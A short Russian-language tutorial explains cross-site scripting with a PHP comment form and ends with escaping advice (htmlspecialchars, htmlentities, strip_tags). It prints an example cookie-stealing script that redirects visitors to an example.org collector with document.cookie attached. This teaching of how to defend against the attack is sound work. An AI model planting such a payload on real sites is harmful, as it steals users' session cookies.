Cross-site Scripting XSS
Позволяет украсть информацию пользователя, например куки. Все приложения, которые выводят пользовательский ввод подвержены этой атаке.
Например, рассмотрим следующую форму для оставления комментария:
<form method="POST" action="process.php">
<p>Add a comment:</p>
<p>
<textarea name="comment"></textarea>
</p>
<p>
<input type="submit">
</p>
</form>
Допустим, что злоумышленник пытается оставить такой комментарий:
<script>
document.location =
'http://example.org/getcookies.php?cookies='
+ document.cookie;
</script>
Теперь любой, кто посетит эту страницу, будет средиректен на данную страницу, а куки пользователя будут добавлены в строку запроса. У себя злоумышленник может запросто получить к ним доступ через $_GET['cookies']
Злоумышленник вводит код/ссылку через HTML/CSS/Javascript на вашу страницу, который изменяет ее поведение на что-нибудь вредоносное. Атака может быть предотвращена с помощью экранирования и валидации данных, например функциями htmlspecialchars(), htmlentities() или strip_tags().